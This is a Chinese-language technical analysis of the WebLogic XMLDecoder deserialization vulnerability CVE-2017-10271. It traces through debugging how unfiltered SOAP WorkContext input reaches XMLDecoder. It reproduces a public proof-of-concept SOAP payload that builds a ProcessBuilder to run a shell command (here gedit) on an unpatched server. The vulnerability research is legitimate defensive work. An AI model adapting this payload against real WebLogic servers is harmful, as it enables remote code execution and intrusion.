WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271)漏洞分析

12月22号，绿盟科技博客发布一篇文章，里面有提及到weblogic由于存在0day漏洞，导致被植入恶意软件用来挖掘比特币。后来经过确认，这次攻击者所用的漏洞CVE编号为CVE-2017-10271，那么这个漏洞究竟是怎样造成的?

0. 分析环境

IDE:Intellij IDEA

中间件版本: weblogic 10.3.6【未进行任何补丁修复】

发包工具: brupsuite

1. 漏洞成因

我们先来看一下，网上公布的poc进行利用后的weblogic返回的响应，公布的利用poc如下:

<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>gedit</string>
</void>
</array>
<void method="start" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body />
</soapenv:Envelope>

如下图所示，可以看到返回的是xml数据，而且可以清晰的看到调用栈，调用栈在<ns2:frame />标签中



仔细分析weblogic返回的响应，我们可以大概定位到问题点，我们重点关注<ns2:frame />标签中class以weblogic开头的部分，这部分就是weblogic处理我们请求的调用栈逻辑，weblogic处理完后就到了XMLDecoder
Step 1. 了解处理流程(为了方便查看，调用栈顺序为从上倒下)

weblogic.wsee.jaxws.workcontext.WorkContextServerTube->processRequest

weblogic.wsee.jaxws.workcontext.WorkContextTube->readHeaderOld

weblogic.wsee.jaxws.workcontext.WorkContextServerTube->receive

weblogic.workarea.WorkContextMapImpl->receiveRequest

weblogic.workarea.WorkContextLocalMap->receiveRequest

weblogic.workarea.spi.WorkContextEntryImpl->readEntry

weblogic.wsee.workarea.WorkContextXmlInputAdapter->readUTF

Step 2.下断点调试
我们将断点设置在weblogic.wsee.jaxws.workcontext.WorkContextServerTube的processRequest方法中readHeaderOld，如下图所示



Step 3.调试运行，跟踪

processRequest中，var1为我们POST的xml数据,类型为Packet;



var3的值有是var2调用get方法后得来的，我们查看一下WorkAreaConstants.WORK_AREA_HEADER的内容，如下图所示



对比Poc内容与WorkAreaContants里面的XML_TAG、WORK_AREA_HEADER，我们不难联想到var2.get方法是用来获取work:WorkContext标签之间的内容。

2.readHeaderOld中，我们直接设置断点到weblogic调用栈最后一个函数WorkContextXmlInputAdapter，查看调用函数的参数值是什么？



可以看到，var4其实对应的是java标签内的代码



3.WorkContextXmlInputAdapter中，没有任何过滤就直接调用XMLDecoder方法，而XMLDecoder本身是用于将XML文件反序列成java的对象，因而造成的漏洞的发生。



归根结底，还是weblogic犯了编码上的错误，完全信任用户的输入，然后调用XMLDecoder进行反序列,导致了这个漏洞的发生。

参考链接

近期大量WebLogic主机感染挖矿病毒
Weblogic WLS组件漏洞技术分析与防护方案

Weblogic XMLDecoder RCE分析